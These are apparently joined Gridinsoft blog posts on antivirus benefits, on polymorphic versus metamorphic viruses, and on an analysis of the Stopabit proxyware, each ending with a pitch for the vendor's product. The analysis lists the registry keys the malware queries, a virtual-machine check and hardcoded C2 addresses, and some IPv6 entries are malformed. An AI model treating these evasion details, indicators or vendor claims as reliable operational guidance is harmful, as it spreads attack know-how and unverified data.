Furthermore, employing two-factor authentication wherever possible can drastically enhance the security of your online accounts, effectively minimizing the risk of unauthorized access. Lastly, the cornerstone of a solid cybersecurity strategy is the installation of trustworthy antivirus software. A vigilant approach, combined with reliable security programs, forms the most effective defense, detecting and eliminating threats before they can cause any damage.

How Malware Protection Can Help?

We were going to discuss the benefits of using malware protection, and now, let’s delve into what an antivirus does. Consider the example of Gridinsoft Malicious Software Removal. This program offers comprehensive triple protection.

The first layer is On-Run Protection. The program monitors all new files on your machine. Before any incoming file can cause damage, it scans it. If identified as malicious or unwanted, the file is immediately quarantined, allowing the user to decide whether to delete it or restore it.

Next, there’s Internet Protection. This function blocks hazardous websites and alerts you about suspicious ones. Websites are deemed dangerous if they contain malicious scripts or lack an SSL certificate. These blocks and warnings, though overridable, provide essential protection in most scenarios.

The most thorough option is the Deep Scan. You can choose the scope of the scan: a more comprehensive scan takes longer but increases the likelihood of detecting and eliminating malware. Some malware types can only be uncovered and removed through such in-depth scanning.

Malware Protection Parting Wishes

By integrating various virus detection methods, Gridinsoft products showcase versatility and effectiveness, performing robustly on both home and corporate devices. You can deploy this software as your primary security system or as a supplementary antivirus scanner. Its cost-effectiveness is matched by its efficacy.

As for the general benefits of using antivirus software, they are undeniable. Threats may seem distant until they directly impact you. Cybersecurity is no exception to this rule. However, any doubts about the necessity of antivirus will likely dissipate after the first successful interception of a dangerous Trojan, ideally neutralized by your antivirus.

The post Malware Protection appeared first on Gridinsoft Blog.

In this article, we consider two types of pests: polymorphic and metamorphic viruses, which were designed to destroy the integrity of the operating system and harm the user. Before we find out what is the difference between polymorphic and metamorphic viruses, let’s figure out what is virus in general and where it originates.

What is a Polymorphic Virus?

To understand a polymorphic virus, let’s consider a persistent threat that constantly evades anti-malware. This threat creates similar viruses, seemingly regenerating itself. Its main target is the user’s device and data, adapting as much as needed to achieve its goal. In summary:

A polymorphic virus is a complex virus encrypted with a variable key, making each copy of the virus different from the others. The virus aims to evade anti-malware or scanners. While typical malware can be detected by anti-malware software, a polymorphic virus is designed to change its encryption keys. For example, if one user downloads a file from a website and another user downloads the same file, the two files will appear different to security programs.

Normally, a scanner or anti-malware could detect a virus through identical keys in different files. However, a polymorphic virus complicates this by using different encryption keys for different files. To detect polymorphic viruses, there are two primary methods: general description technology and an algorithm at the entry point. The general description technology runs the file on a protected virtual computer, while the entry point algorithm verifies machine code at each file’s entry point, employing software virus detection.

What is a Metamorphic Virus?

Let’s explore a metamorphic virus. This type of virus reprograms itself to evade detection. What does this mean? The virus transmits its own code and creates a temporary representation to outmaneuver antivirus software. Once it bypasses security, it rewrites itself into the normal code. Each copy of this virus is always different, making it difficult for anti-malware to detect.

A metamorphic virus transforms by editing, rewriting, and translating its own code. Its goal is to damage the computer while remaining unnoticed by anti-malware. Unlike polymorphic viruses, metamorphic viruses do not use encryption keys to alter their copies. Instead, the virus converts its existing instructions into functionally equivalent instructions when creating a copy. This transformation prevents the virus from returning to its original form, complicating the work of anti-malware programs. Two methods to detect metamorphic viruses are: using emulators to track them and geometric detection.

Difference Between Polymorphic and Metamorphic Virus

While these viruses are generally similar in that they attempt to circumvent the security system by altering their own codes, there is still a difference between them.

1. Polymorphic virus involves changing each copy of its code to bypass anti-malware protection, while Metamorphic Virus with each iteration rewrites its own code.
2. The polymorphic virus uses the encryption key to change its code, while Metamorphic Virus itself rewrites its code.
3. Writing Metamorphic Virus is much more difficult for a programmer than creating a Polymorphic one, because you need to use several methods of conversion.
4. Methods for detecting these two viruses are different. In the case of polymorphic viruses, we need such methods: general description technology and input point algorithms. And in the case of Metamorphic Virus, you need to use the following methods: the use of emulators for tracking and geometric detection.

How to remove Polymorphic or Metamorphic Virus?

In order to reduce the risks of infection and prevent threats, install an effective antivirus tool on your PC. Our Anti-malware is a great choice. Do not neglect your safety. Gridinsoft Anti-Malware is proper and reliable protection that will be your best line of defense.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Polymorphic vs Metamorphic Virus appeared first on Gridinsoft Blog.

Such applications are commonly distributed through software bundling. This supposes installation along with pirated software, game mods and similar software from questionable sources.

Stopabit Virus Overview

Stopabit is a malicious software that manifests as a process within the Windows Task Manager. It falls into the Potentially Unwanted Applications (PUAs) category, working as proxyware. This means that Stopabit can route third-party traffic through the system it is active in. Aside from this, it pretends to be a convenient tool to schedule short breaks in your PC usage, presumably to take care of your eyes.

Key danger of proxyware is the unauthorized usage of the system’s bandwidth. During the installation, Stopabit says it will monetize using Globalhop SDK. The latter looks legit only on surface: as numerous analyses from well-known security vendors show, this SDK was repeatedly used to route illegal traffic. As gray proxy services are rather popular in the Darknet, it is pretty easy to understand where this traffic comes from.

EULA of Stopabit App - with the rows regarding the use of Globalhop SDK

EULA of Stopabit App - with the rows regarding the use of Globalhop SDK

Similarly to other proxyware apps, Stopabit mainly gets into user devices through pirated software and similar illegal programs like keygens and activators. Sometimes, it can infiltrate systems through fake versions of mods for popular games.

Stopabit Runtime Analysis

To understand how Stopabit works, let’s go through each step of its actions by analyzing one of its samples. Immediately after the installation, it sends the notification to the tray, offering to start using the tool.

The interface of the program is pretty ascetic, to say the least. There is only one panel with possible actions; the rest of things that are available from the tray are just EULA, some basic settings and program info. Thing is – all these functions are already present in Windows, as a part of the Focus app.

And well, the main course of Stopabit is its proxyware module. It starts together with the program, and appears to have its own persistence settings. Even when you stop the program from the tray, the corresponding process in the Task Manager keeps running. This means proxy connections will keep operating until you remove the program completely.

System Reconnaissance

Stopabit tries to gather detailed information about the system by interacting with the Windows Registry, querying running processes, and reading various system configuration settings. It also tries to get information on the installed software, including software policies and cryptographic machine GUID, the OS version, system information, query environment variables, and get the disk size, system language, geographical location, and time zone information.

HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\RegisteredProfiles
HKCU\Software\Classes\Local
HKCU\Software\Classes\Local Settings\MuiCache\1F4\52C64B7E\LanguageList

The registry keys include interface and language preferences, application settings, internet connection, session and recovery details, installed applications, internet settings, security certificates, Windows settings, registry values, and security policies.

It also tries to detect virtual machines to hinder analysis by this value

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\RegisteredProfiles

This registry key is related to color management in Windows. The malware understands whether it is in a virtualized environment depending on the response received.

C2 connection

The malware uses secure web protocols (HTTPS) to communicate with its command and control server. This makes detecting malicious traffic an exceptionally hard task, as this blocks the ability to detect it by specific parts. It also transmits data using the following non-standard ports – another anti-detect and anti-sniff feature. All the possible C2 servers are hardcoded into the sample, probably during the compilation.

track.stopabit.com/v1/?c=381B2D6D-3DF2-41A2-8798-9AD14FB5F586&i=ba6361541ad79f7d5bb94c8f8cec972d&e=preinstall&n=Stopabit&v=1.0.2.0
128.140.126.44:32069 (UDP)
a83f:8110:0:0:1400:1400:2800:3800:53 (UDP)
a83f:8110:2800:0:2800:0:1800:0:53 (UDP)

How To Remove Stopabit?

Removing Stopabit almost mandatory involves using anti-malware software. GridinSoft Anti-Malware is a great solution to remove Stopabit and other malware in a few clicks. Manual removal is barely possible, since this application creates numerous backup copies around the disk, that will restore the threat back. This tool will find and delete them all at once.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Stopabit Virus appeared first on Gridinsoft Blog.